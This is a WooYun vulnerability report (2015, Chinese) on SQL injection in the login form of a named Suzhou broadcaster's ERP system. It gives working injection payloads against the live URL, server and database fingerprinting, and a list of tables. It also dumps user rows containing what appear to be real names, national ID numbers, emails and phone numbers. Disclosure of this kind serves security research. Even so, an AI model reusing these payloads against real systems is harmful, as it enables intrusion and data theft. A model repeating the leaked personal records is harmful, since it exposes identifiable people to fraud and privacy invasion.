当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156956

漏洞标题:苏州广电网某管理系统SQL注入(商户帐号密码/银行卡/邮箱/手机/打卡/工作日志)

相关厂商:csztv.cn

漏洞作者: 路人甲

提交时间:2015-11-30 09:36

修复时间:2015-12-05 09:38

公开时间:2015-12-05 09:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-30: 细节已通知厂商并且等待厂商处理中
2015-12-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://erp.csztv.cn/member --forms

Place: POST
Parameter: password
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: username=EkfU&password=-6480' OR (5389=5389)#&submit=%E7%99%BB %E5%BD%95
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: username=EkfU&password=' AND (SELECT 8421 FROM(SELECT COUNT(*),CONCAT(0x3a6e766f3a,(SELECT (CASE WHEN (8421=8421) THEN 1 ELSE 0 END)),0x3a6779793a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'bjHd'='bjHd&submit=%E7%99%BB %E5%BD%95
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: username=EkfU&password=' UNION ALL SELECT CONCAT(0x3a6e766f3a,0x56706b4753516b416c69,0x3a6779793a),NULL,NULL,NULL,NULL#&submit=%E7%99%BB %E5%BD%95
---
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0
available databases [4]:
[*] aitupu
[*] bang
[*] information_schema
[*] vote


Database: bang
[77 tables]
+----------------------------+
| adcenter |
| att_daka_detail_his |
| att_daka_his |
| att_leave |
| att_log_his |
| att_members |
| att_task |
| att_train |
| att_train_user |
| att_usertask |
| bang_action_prize |
| bang_candidate |
| bang_capta |
| bang_changelog |
| bang_event |
| bang_group |
| bang_hostip |
| bang_mob_dinfo |
| bang_mob_gg |
| bang_module |
| bang_news |
| bang_node |
| bang_option_his |
| bang_page_option |
| bang_page_option_bak |
| bang_page_option_old |
| bang_page_result |
| bang_page_title |
| bang_phone |
| bang_phone_tamp |
| bang_poll |
| bang_poll_info |
| bang_poll_info_temp |
| bang_poll_infot |
| bang_poster |
| bang_rank_news |
| bang_rank_trade |
| bang_sessions |
| bang_sign |
| bang_smsinfo |
| bang_smsinfo_back |
| bang_survey |
| bang_tjinfo |
| bang_tjtype |
| bang_user |
| bang_user_action |
| bang_user_group |
| bang_user_group_permission |
| bang_user_permission |
| class |
| contable |
| host13_image |
| host13_news |
| host_image |
| host_news |
| intorder |
| poll_ads |
| poster |
| qauserinfo |
| range |
| test_test |
| torder |
| trade |
| userinfo |
| wy_action |
| wy_capta |
| wy_student |
| wy_vote |
| yd_daka_detail_his |
| yd_daka_his |
| yd_leave |
| yd_log_his |
| yd_members |
| yd_task |
| yd_train |
| yd_train_user |
| yd_usertask |
+----------------------------+
back-end DBMS: MySQL 5.0
Database: bang
+-----------+---------+
| Table | Entries |
+-----------+---------+
| bang_user | 47828 |
+-----------+---------+
Database: bang
Table: bang_user
[14 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| age | int(4) |
| ban | tinyint(4) |
| banreason | varchar(200) |
| email | varchar(50) |
| id | int(11) |
| idcard | varchar(20) |
| income | int(6) |
| isok | int(1) |
| mobile | bigint(12) |
| name | varchar(50) |
| point | double |
| rname | varchar(20) |
| sex | int(4) |
| uid | int(11) |
+-----------+--------------+
+----+-------+--------------------+-----+-----+-----+-------------+------+---------+--------+-------------------------+-------------+--------+-----------+
| id | uid | idcard | age | ban | sex | name | isok | rname | point | email | mobile | income | banreason |
+----+-------+--------------------+-----+-----+-----+-------------+------+---------+--------+-------------------------+-------------+--------+-----------+
| 2 | 2 | 320502198708254568 | 3 | 0 | 0 | hello | 1 | <blank> | 1200 | <blank> | 0 | 3 | <blank> |
| 12 | 1387 | 320502197410182014 | 3 | 0 | 0 | hoho | 1 | 陆彬彬 | 2604 | lubinbinhao2006@163.com | 18762433406 | 3 | <blank> |
| 13 | 47 | 321302198802170038 | 2 | 0 | 0 | 苍老师 | 1 | 张乐乐 | 1260 | 61084238@163.com | 13814846955 | 3 | <blank> |
| 14 | 16538 | <blank> | 0 | 0 | 0 | 13584808226 | 0 | <blank> | 450 | <blank> | 2147483647 | 0 | <blank> |
| 15 | 16789 | <blank> | 4 | 0 | 0 | hello123 | 1 | <blank> | 1230 | <blank> | 18762433406 | 4 | <blank> |
| 16 | 16790 | <blank> | 0 | 0 | 0 | hello12345 | 0 | <blank> | 50 | <blank> | 2147483647 | 0 | <blank> |
| 31 | 14967 | 32052519880804255x | 2 | 0 | 0 | jeson | 1 | <blank> | 2184 | <blank> | 0 | 1 | <blank> |
| 19 | 12 | 320502197410182019 | 3 | 0 | 0 | 与钱有关 | 1 | <blank> | 6145 | <blank> | 0 | 5 | <blank> |
| 26 | 13582 | <blank> | 28 | 0 | 1 | 素颜baby | 1 | <blank> | 4280 | <blank> | 0 | 3500 | <blank> |
| 24 | 16815 | <blank> | 20 | 0 | 0 | testnewuser | 1 | <blank> | 1050 | <blank> | 18762433406 | 127 | <blank> |
| 27 | 71 | 320504198809053769 | 2 | 0 | 1 | 一枚肉丸子 | 1 | <blank> | 1160 | <blank> | 0 | 1 | <blank> |
| 28 | 234 | <blank> | 23 | 0 | 1 | 偶们结婚吧 | 1 | <blank> | 1340 | <blank> | 0 | 2333 | <blank> |
| 29 | 13908 | <blank> | 0 | 0 | 0 | 格子小妞 | 0 | <blank> | 180 | <blank> | 0 | 0 | <blank> |
| 32 | 1668 | <blank> | 0 | 0 | 0 | 不吃羊肉的筒子 | 0 | <blank> | 0 | <blank> | 0 | 0 | <blank> |
| 33 | 129 | <blank> | 0 | 0 | 0 | 唐僧家的猫 | 0 | <blank> | 0 | <blank> | 0 | 0 | <blank> |
+----+-------+--------------------+-----+-----+-----+-------------+------+---------+--------+-------------------------+-------------+--------+-----------+


漏洞证明:

s2.png


s1.png


s4.png


s3.png

修复方案:

预编译+sql参数话
过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-05 09:38

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价